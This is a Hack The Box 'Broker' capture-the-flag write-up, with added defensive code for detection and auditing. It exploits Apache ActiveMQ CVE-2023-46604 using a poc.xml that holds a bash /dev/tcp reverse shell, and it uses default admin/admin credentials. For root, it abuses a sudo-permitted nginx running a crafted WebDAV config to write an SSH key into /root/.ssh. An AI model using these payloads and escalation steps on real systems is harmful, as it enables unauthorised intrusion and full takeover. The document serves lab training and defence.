HTB Broker done
Broker
OS:
Linux
Technology:
nginx 1.18.0
Jetty 9.4.39.v20210325
ActiveMQ 5.15.15
mqtt
amqp
IP Address:
10.10.11.243
Open ports:
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
1883/tcp open mqtt
5672/tcp open amqp?
8161/tcp open http Jetty 9.4.39.v20210325
44585/tcp open tcpwrapped
61613/tcp open stomp Apache ActiveMQ
61614/tcp open http Jetty 9.4.39.v20210325
61616/tcp open apachemq ActiveMQ OpenWire transport
Users and passwords:
Login
L: admin
P: admin
Nmap
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Broker]
└─$ sudo nmap -A -sV --script=default -p- --open -oA 10.10.11.243_nmap 10.10.11.243 ; cat 10.10.11.243_nmap.nmap | grep "tcp.*open"
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-22 14:55 CEST
Nmap scan report for 10.10.11.243
Host is up (0.059s latency).
Not shown: 65526 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3eea454bc5d16d6fe2d4d13b0a3da94f (ECDSA)
|_ 256 64cc75de4ae6a5b473eb3f1bcfb4e394 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Error 401 Unauthorized
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ basic realm=ActiveMQRealm
|_http-server-header: nginx/1.18.0 (Ubuntu)
1883/tcp open mqtt
| mqtt-subscribe:
| Topics and their most recent payloads:
|_ ActiveMQ/Advisory/Consumer/Topic/#:
5672/tcp open amqp?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, GetRequest, HTTPOptions, RPCCheck, RTSPRequest, SSLSessionReq, TerminalServerCookie:
| AMQP
| AMQP
| amqp:decode-error
|_ 7Connection from client using unsupported AMQP attempted
|_amqp-info: ERROR: AQMP:handshake expected header (1) frame, but was 65
8161/tcp open http Jetty 9.4.39.v20210325
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ basic realm=ActiveMQRealm
|_http-title: Error 401 Unauthorized
|_http-server-header: Jetty(9.4.39.v20210325)
44585/tcp open tcpwrapped
61613/tcp open stomp Apache ActiveMQ
| fingerprint-strings:
| HELP4STOMP:
| ERROR
| content-type:text/plain
| message:Unknown STOMP action: HELP
| org.apache.activemq.transport.stomp.ProtocolException: Unknown STOMP action: HELP
| org.apache.activemq.transport.stomp.ProtocolConverter.onStompCommand(ProtocolConverter.java:258)
| org.apache.activemq.transport.stomp.StompTransportFilter.onCommand(StompTransportFilter.java:85)
| org.apache.activemq.transport.TransportSupport.doConsume(TransportSupport.java:83)
| org.apache.activemq.transport.tcp.TcpTransport.doRun(TcpTransport.java:233)
| org.apache.activemq.transport.tcp.TcpTransport.run(TcpTransport.java:215)
|_ java.lang.Thread.run(Thread.java:750)
61614/tcp open http Jetty 9.4.39.v20210325
|_http-title: Site doesn't have a title.
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Jetty(9.4.39.v20210325)
61616/tcp open apachemq ActiveMQ OpenWire transport
| fingerprint-strings:
| NULL:
| ActiveMQ
| TcpNoDelayEnabled
| SizePrefixDisabled
| CacheSize
| ProviderName
| ActiveMQ
| StackTraceEnabled
| PlatformDetails
| Java
| CacheEnabled
| TightEncodingEnabled
| MaxFrameSize
| MaxInactivityDuration
| MaxInactivityDurationInitalDelay
| ProviderVersion
|_ 5.15.15
Open website: http://10.10.11.243/
I used default creds (HTTP basic auth) and opened the website http://10.10.11.243/admin/
L: admin
P: admin
Exploit: CVE-2023-46604 - Apache ActiveMQ Remote Code Execution
https://github.com/evkl1d/CVE-2023-46604
Download the exploit
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Broker]
└─$ git clone https://github.com/evkl1d/CVE-2023-46604.git
Cloning into 'CVE-2023-46604'...
remote: Enumerating objects: 22, done.
remote: Counting objects: 100% (22/22), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 22 (delta 5), reused 13 (delta 3), pack-reused 0
Receiving objects: 100% (22/22), 5.10 KiB | 53.00 KiB/s, done.
Resolving deltas: 100% (5/5), done.
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Broker]
└─$ cd CVE-2023-46604
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Broker/CVE-2023-46604]
└─$ ls
exploit.py poc.xml README.md
Edit the exploit's poc.xml (set the reverse-shell IP)
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Broker/CVE-2023-46604]
└─$ cat poc.xml
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="
http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>bash</value>
<value>-c</value>
<value>bash -i >& /dev/tcp/10.10.10.10/9001 0>&1</value>
</list>
</constructor-arg>
</bean>
</beans>
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Broker/CVE-2023-46604]
└─$ vim poc.xml
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Broker/CVE-2023-46604]
└─$ cat poc.xml | grep 10.10.16.7
<value>bash -i >& /dev/tcp/10.10.16.7/9001 0>&1</value>
Run exploit
Run webserver - python
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Broker/CVE-2023-46604]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.243 - - [22/Apr/2024 15:32:09] "GET /poc.xml HTTP/1.1" 200 -
10.10.11.243 - - [22/Apr/2024 15:32:09] "GET /poc.xml HTTP/1.1" 200 -
---
Run netcat
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Broker/CVE-2023-46604]
└─$ rlwrap nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.243] 56338
bash: cannot set terminal process group (883): Inappropriate ioctl for device
bash: no job control in this shell
activemq@broker:/opt/apache-activemq-5.15.15/bin$ id
id
uid=1000(activemq) gid=1000(activemq) groups=1000(activemq)
---
Run exploit
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Broker/CVE-2023-46604]
└─$ python exploit.py -i 10.10.11.243 -u http://10.10.16.7/poc.xml
_ _ _ __ __ ___ ____ ____ _____
/ \ ___| |_(_)_ _____| \/ |/ _ \ | _ \ / ___| ____|
/ _ \ / __| __| \ \ / / _ \ |\/| | | | |_____| |_) | | | _|
/ ___ \ (__| |_| |\ V / __/ | | | |_| |_____| _ <| |___| |___
/_/ \_\___|\__|_| \_/ \___|_| |_|\__\_\ |_| \_\\____|_____|
[*] Target: 10.10.11.243:61616
[*] XML URL: http://10.10.16.7/poc.xml
[*] Sending packet: 0000006c1f000000000000000000010100426f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e74657874010019687474703a2f2f31302e31302e31362e372f706f632e786d6c
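The hex the exploit prints is the only thing a network sensor sees of this attack: a single OpenWire ExceptionResponse frame whose "exception class" slot carries a Spring ApplicationContext class and whose "message" slot carries the URL of the XML to load. The decoder below is an added example for detection, not part of the writeup or of the evkl1d exploit; it takes the frame bytes from the line above, walks the loose-encoded fields (size prefix, command type 0x1f, commandId, responseRequired, correlationId, then presence-flagged strings for class name and message; this layout is my reading of OpenWire's ExceptionResponse and is checked against the page's own bytes), and reports why the frame looks like CVE-2023-46604 abuse rather than a genuine broker error. The heuristics (class name not ending in Exception/Error/Throwable, ApplicationContext in the class name, URL-shaped message) are my own.

```python
import struct
from dataclasses import dataclass
from typing import List, Optional

# OpenWire command type of an ExceptionResponse frame (the 0x1f byte after the size prefix).
EXCEPTION_RESPONSE = 0x1F

# Constructed copy of the frame the writeup's exploit printed, split by field for readability.
CAPTURED_FRAME_HEX = (
    "0000006c"          # 4-byte size prefix: 108 payload bytes follow
    "1f"                # command type: ExceptionResponse
    "00000000"          # commandId
    "00"                # responseRequired
    "00000000"          # correlationId
    "01"                # exception present
    "01" "0042"         # class-name string present, length 66
    "6f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e"
    "436c61737350617468586d6c4170706c69636174696f6e436f6e74657874"
    "01" "0019"         # message string present, length 25
    "687474703a2f2f31302e31302e31362e372f706f632e786d6c"
)


@dataclass
class ExceptionResponse:
    command_id: int
    response_required: bool
    correlation_id: int
    exception_class: Optional[str]
    message: Optional[str]


class _Reader:
    """Cursor over a frame; every read is bounds-checked so a short frame raises."""

    def __init__(self, buf: bytes) -> None:
        self.buf = buf
        self.pos = 0

    def take(self, n: int) -> bytes:
        if self.pos + n > len(self.buf):
            raise ValueError("truncated frame")
        chunk = self.buf[self.pos:self.pos + n]
        self.pos += n
        return chunk

    def u8(self) -> int:
        return self.take(1)[0]

    def i32(self) -> int:
        return struct.unpack(">i", self.take(4))[0]

    def flag(self) -> bool:
        return self.u8() != 0

    def string(self) -> Optional[str]:
        # Loose-encoded string: presence flag, 2-byte big-endian length, then the bytes.
        if not self.flag():
            return None
        length = struct.unpack(">H", self.take(2))[0]
        return self.take(length).decode("utf-8", errors="replace")


def parse_exception_response(frame: bytes) -> ExceptionResponse:
    """Decode one size-prefixed ExceptionResponse frame; raises ValueError on anything else."""
    r = _Reader(frame)
    declared = r.i32()
    if declared != len(frame) - 4:
        raise ValueError(f"size prefix {declared} does not match {len(frame) - 4} payload bytes")
    if r.u8() != EXCEPTION_RESPONSE:
        raise ValueError("not an ExceptionResponse frame")
    command_id = r.i32()
    response_required = r.flag()
    correlation_id = r.i32()
    if not r.flag():  # exception slot is null
        return ExceptionResponse(command_id, response_required, correlation_id, None, None)
    return ExceptionResponse(command_id, response_required, correlation_id, r.string(), r.string())


THROWABLE_SUFFIXES = ("Exception", "Error", "Throwable")
URL_SCHEMES = ("http://", "https://", "file:", "ftp://", "jar:")


def suspicious_reasons(resp: ExceptionResponse) -> List[str]:
    """Return why this frame looks like CVE-2023-46604 abuse (empty list = looks benign)."""
    reasons = []
    cls = resp.exception_class or ""
    msg = resp.message or ""
    if cls and not cls.endswith(THROWABLE_SUFFIXES):
        reasons.append(f"class {cls} is not a Throwable-style name")
    if "ApplicationContext" in cls:
        reasons.append("Spring ApplicationContext class in a Throwable slot (known CVE-2023-46604 gadget)")
    if msg.lower().startswith(URL_SCHEMES):
        reasons.append(f"message is a URL ({msg}), i.e. a remote XML location")
    return reasons


if __name__ == "__main__":
    decoded = parse_exception_response(bytes.fromhex(CAPTURED_FRAME_HEX))
    print(decoded)
    for reason in suspicious_reasons(decoded):
        print("ALERT:", reason)
```

A sensor rule built on this idea fires on the class name and URL rather than on the exploit's fixed byte layout, so the same logic covers FileSystemXmlApplicationContext or a different commandId. The upstream fix in ActiveMQ 5.15.16 is to validate that the class name is a Throwable before instantiating it; until the broker is patched, port 61616 should not be reachable from untrusted networks.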
Read flag: user.txt
activemq@broker:/opt/apache-activemq-5.15.15/bin$ find / -name "user.txt" 2>/dev/null
/home/activemq/user.txt
activemq@broker:/opt/apache-activemq-5.15.15/bin$ cat /home/activemq/user.txt
cat /home/activemq/user.txt
ad5fb3401c1edd660a110e7f32fdfca2
activemq@broker:/opt/apache-activemq-5.15.15/bin$
Privilege Escalation
Check sudo -l
The activemq user can run /usr/sbin/nginx as root without a password
___
activemq@broker:~$ sudo -l
sudo -l
Matching Defaults entries for activemq on broker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User activemq may run the following commands on broker:
(ALL : ALL) NOPASSWD: /usr/sbin/nginx
activemq@broker:~$
Upload ssh key to /root/.ssh/
Prepare config file for nginx
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Broker]
└─$ cat write_file.conf
user root;
events {
worker_connections 1024;
}
http {
server {
listen 3000;
root /;
autoindex on;
dav_methods PUT;
}
}
___
Upload config file
activemq@broker:/tmp$ wget 10.10.16.7/write_file.conf
wget 10.10.16.7/write_file.conf
--2024-04-22 14:01:18-- http://10.10.16.7/write_file.conf
Connecting to 10.10.16.7:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 163 [application/octet-stream]
Saving to: ‘write_file.conf’
0K 100% 146K=0.001s
2024-04-22 14:01:18 (146 KB/s) - ‘write_file.conf’ saved [163/163]
activemq@broker:/tmp$ ls
ls
write_file.conf
___
Run webserver - python
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Broker]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.243 - - [22/Apr/2024 16:01:17] "GET /write_file.conf HTTP/1.1" 200 -
Start a second nginx instance with the crafted config
activemq@broker:/tmp$ sudo /usr/sbin/nginx -c /tmp/write_file.conf
sudo /usr/sbin/nginx -c /tmp/write_file.conf
activemq@broker:/tmp$ ss -tulpn
ss -tulpn
Netid State Recv-Q Send-Q Local Address:Port Peer Address:PortProcess
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 511 0.0.0.0:80 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 511 0.0.0.0:3000 0.0.0.0:*
tcp LISTEN 0 4096 *:61613 *:* users:(("java",pid=944,fd=145))
tcp LISTEN 0 50 *:61614 *:* users:(("java",pid=944,fd=148))
tcp LISTEN 0 4096 *:61616 *:* users:(("java",pid=944,fd=143))
tcp LISTEN 0 128 [::]:22 [::]:*
tcp LISTEN 0 4096 *:1883 *:* users:(("java",pid=944,fd=146))
tcp LISTEN 0 50 *:8161 *:* users:(("java",pid=944,fd=154))
tcp LISTEN 0 4096 *:5672 *:* users:(("java",pid=944,fd=144))
tcp LISTEN 0 50 *:44585 *:* users:(("java",pid=944,fd=26))
activemq@broker:/tmp$
Generate an SSH key
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Broker]
└─$ ssh-keygen
Generating public/private ed25519 key pair.
Enter file in which to save the key (/home/kali/.ssh/id_ed25519): ./id_rsa_broker
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in ./id_rsa_broker
Your public key has been saved in ./id_rsa_broker.pub
The key fingerprint is:
SHA256:QBzdOR9DqOm3GhxnhuocthxOZ+kTwziizBY43PRHUew kali@pentest
The key's randomart image is:
+--[ED25519 256]--+
| .oooo +. |
| .....= o |
| . oo o o |
| . ooE . |
|..o . .+S + |
|o.....o+=*. |
| + o .B.*+ . |
| = B B... |
| . * oo |
+----[SHA256]-----+
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Broker]
└─$ cat id_rsa_broker.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPeRu1TefscB0E79TibwT4gFnwQQt49yuz8kk39ygX30 kali@pentest
Write ssh key to /root/.ssh/
activemq@broker:/tmp$ curl -X PUT localhost:3000/root/.ssh/authorized_keys -d 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPeRu1TefscB0E79TibwT4gFnwQQt49yuz8kk39ygX30 kali@pentest'
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 93 0 0 100 93 0 42119 --:--:-- --:--:-- --:--:-- 93000
activemq@broker:/tmp$
SSH connection as root
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Broker]
└─$ ssh root@10.10.11.243 -i /tmp/id_rsa_broker
The authenticity of host '10.10.11.243 (10.10.11.243)' can't be established.
ED25519 key fingerprint is SHA256:TgNhCKF6jUX7MG8TC01/MUj/+u0EBasUVsdSQMHdyfY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.243' (ED25519) to the list of known hosts.
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-88-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon Apr 22 02:06:04 PM UTC 2024
System load: 0.0
Usage of /: 71.4% of 4.63GB
Memory usage: 14%
Swap usage: 0%
Processes: 160
Users logged in: 0
IPv4 address for eth0: 10.10.11.243
IPv6 address for eth0: dead:beef::250:56ff:feb9:d2cd
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
root@broker:~# id
uid=0(root) gid=0(root) groups=0(root)
Read flag: root.txt
root@broker:~# cd /root
root@broker:~# ls -a
. .. .bash_history .bashrc .cache cleanup.sh .local .profile root.txt .ssh
root@broker:~# cat root.txt
96b83fd55987625eec9152c68ad1b0f5
root@broker:~#
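The privilege escalation above needs two misconfigurations together: a sudoers rule that lets an unprivileged user start nginx with any arguments (so any `-c` config file), and an nginx config that runs workers as root, serves `/` and enables WebDAV PUT. The audit below is an added example written from the defender's side, not code from the writeup; it parses the `sudo -l` rule and the write_file.conf shown above (both embedded as constructed copies) and reports each of those conditions. The nginx tokenizer is a minimal one of my own (directives terminated by `;`, blocks by `{ }`, comments stripped) and the list of WebDAV write methods is my own choice.

```python
import re
import shlex
from typing import List, Tuple

# Constructed copies of the two artefacts from the writeup: the sudo -l rule and write_file.conf.
SUDO_RULE = "(ALL : ALL) NOPASSWD: /usr/sbin/nginx"
NGINX_CONF = """\
user root;
events {
    worker_connections 1024;
}
http {
    server {
        listen 3000;
        root /;
        autoindex on;
        dav_methods PUT;
    }
}
"""

# WebDAV methods that create or change files on disk.
WRITE_METHODS = {"PUT", "DELETE", "MKCOL", "COPY", "MOVE"}

Directive = Tuple[str, str, List[str]]  # (context path, directive name, arguments)


def parse_nginx(conf: str) -> List[Directive]:
    """Tokenise an nginx config into (context, directive, args), tracking block nesting."""
    conf = re.sub(r"#.*", "", conf)  # strip comments
    tokens = re.findall(r"[{};]|[^\s{};]+", conf)
    stack: List[str] = []
    words: List[str] = []
    out: List[Directive] = []
    for tok in tokens:
        if tok == ";":
            if words:
                out.append(("/".join(stack) or "main", words[0], words[1:]))
            words = []
        elif tok == "{":
            stack.append(words[0] if words else "?")
            words = []
        elif tok == "}":
            if stack:
                stack.pop()
            words = []
        else:
            words.append(tok)
    return out


def audit_nginx(conf: str) -> List[str]:
    """Report the settings that turn an nginx instance into a root-level file writer."""
    findings = []
    serves_root_fs = False
    can_write = False
    for ctx, name, args in parse_nginx(conf):
        if name == "user" and args and args[0] == "root":
            findings.append(f"{ctx}: worker processes run as root")
        elif name == "root" and args and args[0] == "/":
            serves_root_fs = True
            findings.append(f"{ctx}: document root is the filesystem root")
        elif name == "autoindex" and args and args[0] == "on":
            findings.append(f"{ctx}: directory listing enabled")
        elif name == "dav_methods":
            enabled = WRITE_METHODS & {a.upper() for a in args}
            if enabled:
                can_write = True
                findings.append(f"{ctx}: WebDAV write methods enabled ({', '.join(sorted(enabled))})")
    if serves_root_fs and can_write:
        findings.append("CRITICAL: WebDAV writes land anywhere on the filesystem, with the worker's privileges")
    return findings


def audit_sudo_rule(rule: str) -> List[str]:
    """Flag one 'sudo -l' command line of the form '(runas) TAG: command [args]'."""
    m = re.match(r"\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$", rule.strip())
    if not m:
        raise ValueError(f"unrecognised sudo rule: {rule!r}")
    tags = m.group("tags").upper()
    argv = shlex.split(m.group("cmd"))
    findings = []
    if "NOPASSWD" in tags:
        findings.append(f"{argv[0]} runs as ({m.group('runas')}) without re-authentication")
    if len(argv) == 1:
        findings.append(f"{argv[0]} has no pinned arguments, so any flag is allowed (e.g. an alternate config file)")
    return findings


if __name__ == "__main__":
    for line in audit_sudo_rule(SUDO_RULE) + audit_nginx(NGINX_CONF):
        print("-", line)
```

The sudoers finding is the one that matters for remediation: pinning the arguments (for example allowing only `/usr/sbin/nginx -s reload`) removes the `-c` path entirely, after which the crafted config is just a file in /tmp. The nginx checks are useful on their own for reviewing configs that a service account is expected to edit.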
References
[CVE-2023-46604 - Apache ActiveMQ Remote Code Execution](https://github.com/evkl1d/CVE-2023-46604)
Lessons Learned